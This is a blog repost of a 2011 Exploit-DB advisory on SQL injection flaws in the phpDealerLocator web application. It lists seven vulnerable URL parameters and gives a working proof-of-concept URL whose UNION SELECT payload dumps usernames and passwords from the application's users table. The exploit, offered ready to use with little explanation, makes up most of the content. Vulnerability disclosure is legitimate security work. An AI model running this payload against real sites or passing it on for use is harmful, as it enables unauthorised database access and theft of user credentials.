Skip to content
AppUnix

phpDealerLocator Multiple SQL Injection Vulnerabilities

04/07/2011 by little_oak

# Exploit Title: phpDealerLocator - Multiple SQL Injection vulnerabilities
# Date: 7/3/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: phpdealerlocator.yourphppro.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:

record.php?Dealer_ID=
record_country.php?Dealer_ID=
results_latlong.php?s_Latitude=
results_latlong.php?s_Longitude=
results_latlong.php?s_Dealer_Radius=
results_phone.php?s_Dealer_Radius=
results_radius.php?s_Dealer_Radius=

##############################################################
PoC:

http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--

##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew

Fonte: http://www.exploit-db.com/exploits/17477/

Post navigation

Previous Post:

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

Next Post:

Como instalar Apache, PHP, MySQL, Phpmyadmin e MemCached no FreeBSD 7

Pesquisa

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2021 AppUnix | Protegido Por MxGuardDoG